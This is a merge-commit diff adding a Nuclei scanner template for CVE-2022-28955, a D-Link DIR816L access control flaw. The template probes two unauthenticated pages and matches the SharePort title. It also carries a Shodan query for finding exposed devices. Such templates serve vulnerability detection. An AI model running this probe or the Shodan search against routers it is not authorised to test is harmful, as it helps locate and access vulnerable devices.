Merge pull request #5106 from arafatansari/patch-55

Create CVE-2022-28955.yaml

cves/2022/CVE-2022-28955.yaml

@@ -0,0 +1,34 @@
+id: CVE-2022-28955
+
+info:
+  name: D-Link DIR816L - Access Control
+  author: arafatansari
+  severity: high
+  description: |
+    An access control issue in D-Link DIR816L_FW206b01 allows unauthenticated attackers to access folders folder_view.php and category_view.php.
+  reference:
+    - https://github.com/shijin0925/IOT/blob/master/DIR816/1.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-28955
+  classification:
+    cve-id: CVE-2022-28955
+  metadata:
+    verified: true
+    shodan-query: http.html:"DIR-816L"
+  tags: cve,cve2022,dlink,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/category_view.php"
+      - "{{BaseURL}}/folder_view.php"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>SharePort Web Access</title>'
+
+      - type: status
+        status:
+          - 200